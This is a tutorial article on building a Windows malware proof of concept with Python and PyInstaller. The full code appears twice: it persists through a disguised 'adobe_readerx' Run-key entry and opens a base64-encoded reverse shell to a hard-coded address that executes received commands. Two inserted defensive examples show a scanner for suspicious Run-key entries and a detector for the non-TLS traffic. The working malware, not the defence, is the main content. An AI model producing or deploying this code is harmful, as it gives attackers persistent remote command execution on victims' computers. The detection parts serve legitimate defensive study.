Technology sharing: Building a malware PoC with Python and PyInstaller

Source: Internet
Author: User


Disclaimer: This article is intended for knowledge sharing and must never be used maliciously!
This article shows how to use Python and PyInstaller to build a small malware proof of concept (PoC).

As we all know, malware usually needs to persist on the target so that it survives a reboot. There are many ways to achieve this on Windows; the most common one is to add a value under the registry key "Software\Microsoft\Windows\CurrentVersion\Run". The following Python code copies the program into the %TEMP% directory and then modifies that key so the copy is executed every time a user logs on.
    import sys, base64, os, socket, subprocess
    from _winreg import *  # Python 2 module; it is called winreg in Python 3

    def autorun(tempdir, fileName, run):
        # Copy the executable to %TEMP%:
        os.system('copy %s %s' % (fileName, tempdir))

        # Query the Windows registry for the values under the Run key
        # and collect their names in the runkey list
        key = OpenKey(HKEY_LOCAL_MACHINE, run)
        runkey = []
        try:
            i = 0
            while True:
                subkey = EnumValue(key, i)
                runkey.append(subkey[0])
                i += 1
        except WindowsError:  # EnumValue raises this when there are no more values
            pass

        # Set the autorun value if it is not already there:
        if 'adobe_readerx' not in runkey:
            try:
                key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
                SetValueEx(key, 'adobe_readerx', 0, REG_SZ, r"%TEMP%\mw.exe")
                key.Close()
            except WindowsError:  # e.g. no permission to write to HKLM
                pass
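From the defender's side, the persistence above leaves a very recognisable trace: a Run value whose command points into %TEMP% or another user-writable directory. The following is an added example, not code from the original article, that enumerates the HKLM Run key (on Windows) and flags such entries; the marker list and the sample entries are constructed for the example.

```python
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Directories a properly installed application rarely launches from; entries
# pointing here deserve a second look (list constructed for this example).
USER_WRITABLE_MARKERS = (
    "%temp%",
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\programdata\\",
)

def read_run_key_values():
    """Enumerate the HKLM Run key as a list of (name, data). Windows only."""
    import winreg  # Python 3 name of the _winreg module used by the PoC
    values = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once no more values remain
                break
            values.append((name, str(data)))
            index += 1
    return values

def suspicious_run_entries(entries):
    """Return the (name, data) pairs whose command lives in a user-writable path.
    %TEMP% is matched unexpanded, so both the literal string the PoC writes
    and the expanded AppData\Local\Temp form are caught."""
    flagged = []
    for name, data in entries:
        target = data.lower()
        if any(marker in target for marker in USER_WRITABLE_MARKERS):
            flagged.append((name, data))
    return flagged

# Constructed sample of what an enumeration might return on an infected host.
SAMPLE_ENTRIES = [
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("adobe_readerx", r"%TEMP%\mw.exe"),  # the value the PoC above creates
    ("Updater", r"C:\Users\alice\AppData\Local\Temp\svc.exe"),
]

if __name__ == "__main__":
    entries = read_run_key_values() if sys.platform == "win32" else SAMPLE_ENTRIES
    for name, data in suspicious_run_entries(entries):
        print("suspicious Run entry: %s = %s" % (name, data))
```

The same check applies unchanged to the HKCU Run key, which a non-administrative process can write to and is therefore used at least as often.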
After the executable has been copied to %TEMP% and persistence has been set up, the next part of the code runs: the reverse shell. Here I used the Python reverse shell published by TrustedSec, with one change: the command output is Base64-encoded before it is sent over the network.
    def shell():
        # Base64 encoded reverse shell
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.56.1', int(443)))  # hard-coded listener address
        s.send('[*] Connection Established!')
        while 1:
            data = s.recv(1024)
            if data == "quit":
                break
            # Run the received command and collect stdout and stderr
            proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = proc.stdout.read() + proc.stderr.read()
            encoded = base64.b64encode(stdout_value)
            s.send(encoded)
            # s.send(stdout_value)  # original (unencoded) version
        s.close()

    def main():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        run = r"Software\Microsoft\Windows\CurrentVersion\Run"
        autorun(tempdir, fileName, run)
        shell()

    if __name__ == "__main__":
        main()
Now, when this program is executed, it opens a reverse shell back to the "attacker". In this case the "attacker" is just a hard-coded IP address in the script, but pointing it at a domain name or a host in the Amazon cloud is trivial. The capture shows the program running on a Windows host and connecting back to the attacker; note that the network traffic is base64-encoded:
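Base64 hides the command output from a casual glance, but it does not make the traffic look like anything legitimate on TCP 443: a real client starts with a TLS handshake record, while this PoC sends an ASCII banner followed by bare base64 blobs. The following added example, not code from the original article, triages the client-to-server payloads of one such connection; the sample streams are constructed to mimic the PoC above and a genuine TLS client.

```python
import base64
import binascii
import re
import string

# Base64 alphabet with optional padding, nothing else (no spaces, no newlines).
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())

def looks_like_tls_client_hello(payload):
    """A real TLS session starts with a handshake record: type 0x16, version 0x03xx."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03

def decode_if_base64(payload):
    """Return the decoded bytes when payload is a well-formed base64 blob, else None."""
    if len(payload) < 8 or len(payload) % 4 or not B64_RE.match(payload):
        return None
    try:
        return base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return None

def classify_client_stream(payloads):
    """Triage the client->server payloads of one connection to port 443.
    Returns human-readable findings; an empty list means nothing odd was seen."""
    findings = []
    if not payloads:
        return findings
    if not looks_like_tls_client_hello(payloads[0]):
        findings.append("non-TLS first packet on a TLS port")
    if payloads[0].startswith(b"[*]"):
        findings.append("cleartext tool banner: " + payloads[0].decode("ascii", "replace"))
    for payload in payloads[1:]:
        decoded = decode_if_base64(payload.strip())
        if decoded is not None and all(b in PRINTABLE for b in decoded):
            findings.append("base64-wrapped text: " + decoded[:40].decode("ascii"))
    return findings

# Constructed sample streams: what the PoC above emits, and a genuine TLS client.
POC_STREAM = [
    b"[*] Connection Established!",
    base64.b64encode(b" Volume in drive C has no label.\r\n"),
    base64.b64encode(b"Access is denied.\r\n"),
]
TLS_STREAM = [
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 32,
    b"\x17\x03\x03\x00\x20" + b"\x8f\x1c\xd2\x07" * 8,
]

if __name__ == "__main__":
    for label, stream in (("poc", POC_STREAM), ("tls", TLS_STREAM)):
        print(label, classify_client_stream(stream))
```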

The complete code is as follows:

    import sys, base64, os, socket, subprocess
    from _winreg import *  # Python 2 module; it is called winreg in Python 3

    def autorun(tempdir, fileName, run):
        # Copy the executable to %TEMP%:
        os.system('copy %s %s' % (fileName, tempdir))

        # Query the Windows registry for the values under the Run key
        # and store their names in the runkey list
        key = OpenKey(HKEY_LOCAL_MACHINE, run)
        runkey = []
        try:
            i = 0
            while True:
                subkey = EnumValue(key, i)
                runkey.append(subkey[0])
                i += 1
        except WindowsError:  # EnumValue raises this when there are no more values
            pass

        # If the autorun value "adobe_readerx" isn't set, this will set it:
        if 'adobe_readerx' not in runkey:
            try:
                key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
                SetValueEx(key, 'adobe_readerx', 0, REG_SZ, r"%TEMP%\mw.exe")
                key.Close()
            except WindowsError:  # e.g. no permission to write to HKLM
                pass

    def shell():
        # Base64 encoded reverse shell
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.56.1', int(443)))  # hard-coded listener address
        s.send('[*] Connection Established!')
        while 1:
            data = s.recv(1024)
            if data == "quit":
                break
            # Run the received command and collect stdout and stderr
            proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = proc.stdout.read() + proc.stderr.read()
            encoded = base64.b64encode(stdout_value)
            s.send(encoded)
            # s.send(stdout_value)  # original (unencoded) version
        s.close()

    def main():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        run = r"Software\Microsoft\Windows\CurrentVersion\Run"
        autorun(tempdir, fileName, run)
        shell()

    if __name__ == "__main__":
        main()